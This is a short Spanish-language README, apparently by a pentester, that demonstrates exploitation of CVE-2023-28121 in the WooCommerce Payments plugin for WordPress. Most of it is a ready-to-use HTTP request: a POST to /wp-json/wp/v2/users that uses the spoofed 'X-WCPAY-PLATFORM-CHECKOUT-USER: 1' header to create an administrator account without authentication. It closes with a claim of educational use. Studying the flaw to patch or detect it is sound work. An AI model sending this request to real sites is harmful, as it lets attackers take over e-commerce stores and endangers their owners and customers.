
Explotación práctica de vulnerabilidad crítica en WordPress usando el plugin WooCommerce Payments.
Explotación práctica de una vulnerabilidad crítica en WordPress usando el plugin WooCommerce Payments.
La CVE-2023-28121 permite crear usuarios administradores sin autenticación vía REST API.
📊 El plugin afectado posee cientos de miles de instalaciones, siendo ampliamente usado en e-commerces.
https://github.com/user-attachments/assets/cead3884-0924-4320-967f-de9fb3f6cd44
El sistema acepta un header manipulable:
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
Con esto, es posible enviar una solicitud para la creación de un usuario con privilegios elevados sin autenticación válida.
POST /wp-json/wp/v2/users
Content-Type: application/json
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
{
"username": "hacked",
"password": "StrongPass123!",
"email": "[email protected]",
"roles": ["administrator"]
}
✔️ Resultado: creación de usuario admin
/wp-admin👨💻 Autor
Luis Eduardo .M.B.S.R
Pentester / Web Security
LinkedIn: https://www.linkedin.com/in/luis-eduardo-ti/
GitHub: https://github.com/luisdevpentest
Uso educacional en entorno controlado. No me responsabilizo de cómo sea usado tal conocimiento por terceros.